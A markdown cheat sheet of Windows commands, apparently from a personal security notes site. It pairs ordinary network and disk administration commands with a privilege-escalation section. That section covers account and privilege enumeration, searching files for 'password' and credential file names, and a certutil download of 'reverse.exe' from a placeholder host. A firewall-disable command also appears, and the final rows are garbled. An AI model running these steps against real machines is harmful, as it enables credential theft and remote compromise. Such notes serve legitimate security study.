---
title: Windows
date: 2023-04-30T09:00:00Z
draft: false
type: note
author: Kaptan
category: Cyber Security
subcategory: Commands
weight: 2
tags:
  - windows
  - commands
  - tools
---

| Commands     | Description                               |
|--------------|-------------------------------------------|
| `ipconfig`     | displays the current TCP/IP network configuration values assigned to the local computer, including IP address, subnet mask, and default gateway |
| `ipconfig /all`     | displays detailed configuration information for all network adapters, including physical (MAC) address, DHCP lease information, and DNS server addresses |
| `findstr`     | searches for a specific string or pattern within a file or text output It's often used in conjunction with other commands to filter results |
| `ipconfig /release`     | releases the current DHCP lease for all network adapters on the local computer |
| `ipconfig /renew`     | renews the DHCP lease for all network adapters on the local computer |
| `ipconfig /release && ipconfig /renew`    | P.S: Need to use it together |
| `ipconfig /displaydns`     | displays the contents of the DNS resolver cache, which contains information about recently accessed websites and their IP addresses |
| `clip`     | copies the output of a command to the Windows clipboard, allowing you to paste it into another application |
| `ipconfig /flushdns`     | clears the contents of the DNS resolver cache |
| `nslookup`     | queries DNS servers to obtain domain name or IP address mapping information |
| `cls`     | clears the command prompt screen |
| `getmac /v`     | displays the MAC address (physical address) of all network adapters installed on the local computer, along with other information |
| `powercfg /energy`     | generates a detailed report of the computer's power consumption and energy efficiency |
| `powercfg /batteryreport`     | generates a report of the computer's battery usage over time |
| `assoc`     | displays or modifies file type associations |
| `chkdsk /f`     | scans the file system on a specified drive and fixes errors found |
| `chkdsk /r`     | scans the file system on a specified drive, locates bad sectors, and recovers readable information |
| `sfc /scannow`     | scans the Windows system files for corruption and attempts to repair any problems found |
| `DISM /Online /Cleanup /CheckHealth`     | checks the health of the Windows image and reports any issues found |
| `DISM /Online /Cleanup /ScanHealth`     | scans the Windows image for component store corruption and reports any issues found |
| `DISM /Online /Cleanup /RestoreHealth`     | restores the Windows image from a known good source |
| `tasklist`     | displays a list of all currently running processes on the local computer |
| `taskkill`     | terminates a specified process or group of processes |
| `netsh wlan show wlanreport`     | generates a report of the wireless network connection history on the local computer |
| `netsh interface show interface`     | displays a list of all network interfaces on the local computer, including their status |
| `netsh interface ip show address | findstr "IP Address"`     | displays the IP addresses assigned to all network adapters on the local computer |
| `netsh interface ip show dnsservers`     | displays the DNS server addresses assigned to all network adapters on the local computer |
| `netsh advfirewall set allprofiles state off`     | disables the Windows Firewall for all network profiles (Domain, Private, and Public) |
| `netsh advfirewall set allprofiles state off`     | turns off the Windows Firewall for all network profiles (domain, private, public) |
| `netsh advfirewall set allprofiles state on`     | turns on the Windows Firewall for all network profiles (domain, private, public) |
| `ping`     | sends a series of ICMP echo requests to a specified network address or host name to test the connectivity between the local computer and the target host |
| `ping -t`     | continuously sends ICMP echo requests to a specified network address or host name until the command is manually interrupted It is often used for testing network connectivity and stability |
| `tracert`     | traces the path that an IP packet takes from the local computer to a specified network address or host name by sending a series of ICMP echo requests with increasing Time-To-Live (TTL) values |
| `tracert -d`     | is similar to tracert, but it does not perform reverse DNS lookups to resolve IP addresses to host names |
| `netstat`     | displays active network connections, listening ports, and related network statistics |
| `netstat -af`     | displays all active TCP and UDP connections and their respective protocol (IPv4 or IPv6) for all network interfaces |
| `netstat -o`     | displays all active network connections, listening ports, and related network statistics, including the process ID (PID) of the process that is using each connection |
| `netstat -e -t 5`     | displays the Ethernet statistics and active TCP connections for 5 seconds before terminating |
| `route print`     | displays the local IPv4 and IPv6 routing tables, including the destination network addresses, network masks, gateways, interface indexes, and metrics |
| `route add`     | adds a new route to the local IPv4 or IPv6 routing table |
| `route delete`     | removes a route from the local IPv4 or IPv6 routing table |
| `shutdown /r /fw /f /t 0`     | shuts down and restarts the local computer immediately (/t 0), and forces all applications to close (/f). The /fw parameter directs the system to reboot into the firmware (UEFI or BIOS) setup utility | is often used for troubleshooting or maintenance purposes. The /fw parameter is available only on UEFI-based systems. The /r parameter specifies a restart instead of a shutdown |

## Priveledge Escalation

| Commands     | Description
|--------------|--------------------------------
Displays comprehensive system information about the Windows operating system | `systeminfo`
Displays the name of the current host or computer on the network | `hostname`
Displays the username of the current user | `whoami`
Displays the current user's privileges, including their security ID (SID), privilege attributes, and enabled state | `whoami /priv`
Displays the security groups to which the current user belongs, including their group names, SIDs, and attributes | `whoami /groups`
Displays the username of the current user using the echo command | `echo %username%`
Lists all user accounts on the local computer | `net users`
Lists all local groups on the local computer | `net localgroups`
Displays detailed information about the user account named "user1", including their group memberships, privileges, and account status | `net user user1`
Lists all global groups in the domain to which the computer belongs | `net group /domain`
Lists the members of the specified global group in the domain | `net group /domain <Group Name>`
Displays the current state of the Windows Firewall and any active profiles | `netsh firewall show state`
Displays the Windows Firewall configuration settings | `netsh firewall show config`
Displays detailed IP configuration information for all network adapters, including the IP address, subnet mask, and default gateway | `ipconfig /all`
Displays the IP routing table, including all routes and their associated network destinations, gateways, and interface metrics | `route print`
Displays the current contents of the ARP cache, which maps IP addresses to physical MAC addresses | `arp -A`
Lists all installed hotfixes and updates, including their names, descriptions, installation dates, and hotfix IDs | `wmic qfe get Caption,Description,HotFixID,InstalledOn`
Displays the configuration information for the specified Windows service, including its name, display name, description, path to executable, and dependencies | `sc qc ["directory_name"]`
Searches for the string "password" in all .txt, .xml, and .ini files in the current directory and all subdirectories, and displays the lines where the string was found | `findstr /si password *.txt *.xml *.ini`
Searches for files with "pass", "cred", "vnc", or ".config" in their name, recursively in the current directory and all subdirectories | `dir /s *pass* == *cred* == *vnc* == *.config*`
Searches for the string "password" in all files in the current directory and all subdirectories, and displays the filenames where the string was found | `findstr /spin "password" *.*`
Download the file from local machine with python server | `python3 -m http.server`
python -m SimpleHTTPServer
On Windows | `python -m http.server<br>python3 -m http.server<br>py -3 -m http.server`
Download the file with certutil command (similar to wget on Linux)
certutil -urlcache -f -split http | `/[IP]:[PORT]/reverse.exe`
